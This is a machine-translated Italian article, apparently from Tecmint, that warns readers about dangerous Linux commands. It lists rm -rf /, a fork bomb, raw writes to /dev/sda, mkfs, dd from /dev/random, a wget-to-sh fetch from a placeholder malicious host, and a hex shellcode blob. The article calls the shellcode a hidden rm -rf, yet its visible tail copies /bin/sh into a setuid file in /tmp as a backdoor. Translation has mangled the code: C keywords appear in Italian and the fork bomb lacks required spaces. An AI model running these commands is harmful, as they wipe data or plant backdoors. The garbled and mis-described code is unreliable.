Comandi pericolosi in LINUX

10 / 100
()

1. Comando rm -rf

Il comando rm -rf è uno dei modi più veloci per eliminare una cartella e il suo contenuto. Ma un piccolo errore di battitura o ignoranza può causare danni irreparabili al sistema. Alcune delle opzioni utilizzate con il comando rm sono.

  1. Il comando rm in Linux viene utilizzato per eliminare i file.
  2. Il comando rm -r cancella la cartella in modo ricorsivo, anche la cartella vuota.
  3. Il comando rm -f rimuove “File di sola lettura” senza chiedere.
  4. rm -rf / : Forza la cancellazione di tutto nella directory principale.
  5. rm -rf * : Forza la cancellazione di tutto nella directory corrente/di lavoro.
  6. rm -rf . : Forza l’eliminazione della cartella e delle sottocartelle correnti.

Quindi, fai attenzione quando esegui il comando rm -rf . Per evitare l’eliminazione accidentale del file con il comando ‘ rm ‘, crea un alias del comando ‘ rm ‘ come ‘ rm -i ‘ nel file “ .bashrc ”, ti chiederà di confermare ogni eliminazione.

2. :(){:|:&};: Comando

Quanto sopra è in realtà una bomba a forcella . Opera definendo una funzione chiamata ‘ : ‘, che si richiama due volte, una in primo piano e una in background. Continua a funzionare ancora e ancora fino a quando il sistema si blocca.

:(){:|:&};:

3. comando > /dev/sda

Il comando sopra scrive l’output di ‘ comando ‘ sul blocco /dev/sda . Il comando precedente scrive dati grezzi e tutti i file sul blocco verranno sostituiti con dati grezzi, con conseguente perdita totale di dati sul blocco.

4. cartella mv /dev/null

Il comando sopra sposterà ‘ cartella ‘ in /dev/null . In Linux /dev/null o null device è un file speciale che scarta tutti i dati scritti su di esso e segnala che l’operazione di scrittura ha esito positivo.

# mv /home/utente/* /dev/null

Il comando precedente sposterà tutto il contenuto di una directory User in /dev/null , che letteralmente significa tutto ciò che è stato inviato a blackhole ( null) .

5. wget http://origine_maliziosa -O- | SH

Il comando precedente scaricherà uno script da una fonte dannosa e quindi lo eseguirà. Il comando Wget scaricherà lo script e sh eseguirà lo script scaricato.

Nota : dovresti essere molto consapevole della fonte da cui stai scaricando pacchetti e script. Utilizzare solo quegli script/applicazioni scaricati da una fonte attendibile.

6. mkfs.ext3 /dev/sda

Il comando precedente formatterà il blocco ‘ sda’ e sicuramente saprai che dopo l’esecuzione del comando precedente il tuo blocco ( disco rigido ) sarebbe nuovo, NUOVO di zecca! Senza alcun dato, lasciando il tuo sistema in una fase irrecuperabile.

7. > archivio

Il comando precedente viene utilizzato per svuotare il contenuto del file. Se il comando precedente viene eseguito con un errore di battitura o ignoranza come ” > xt.conf” scriverà il file di configurazione o qualsiasi altro file di sistema o configurazione.

8. ^pippo^bar

Questo comando, come descritto nei nostri 10 comandi Linux meno conosciuti , viene utilizzato per modificare il comando di esecuzione precedente senza la necessità di riscrivere nuovamente l’intero comando. Ma questo può essere davvero problematico se non hai corso il rischio di controllare a fondo la modifica nel comando originale usando il comando ^foo^bar .

9. dd if=/dev/random of=/dev/sda

Il comando precedente cancellerà il blocco sda e scriverà dati spazzatura casuali nel blocco. Certo! Il tuo sistema verrebbe lasciato in una fase incoerente e irrecuperabile.

10. Comando NASCOSTO

Il comando seguente non è altro che il primo comando sopra ( rm -rf ). Qui i codici sono nascosti in esadecimale in modo che un utente ignorante possa essere ingannato. L’esecuzione del codice seguente nel terminale cancellerà la partizione di root .

Questo comando qui mostra che la minaccia potrebbe essere nascosta e normalmente non rilevabile a volte. Devi essere consapevole di ciò che stai facendo e quale sarebbe il risultato. Non compilare/eseguire codici da una fonte sconosciuta.

char esp[] __attributo__ ((sezione(“.testo”))) /* esp
pubblicazione */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.oltre; chmod 4755
/tmp/.oltre;”;

Nota : non eseguire nessuno dei comandi precedenti nel terminale o nella shell Linux o nel computer di un amico o della scuola. Se vuoi testarli, eseguili nella macchina virtuale. Qualsiasi incoerenza o perdita di dati, dovuta all’esecuzione del comando di cui sopra, interromperà il tuo sistema per il quale né l’ Autore dell’articolo né Tecmint sono responsabili.

È tutto per ora. Presto sarò di nuovo qui con un altro articolo interessante che adorerai leggere. Fino ad allora Resta sintonizzato e connesso a Tecmint . Se conosci altri comandi Linux pericolosi e vorresti che li aggiungessimo all’elenco, comunicacelo tramite la sezione commenti e non dimenticare di fornire il tuo prezioso feedback.

How useful was this post?

Click on a star to rate it!

Average rating / 5. Vote count:

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?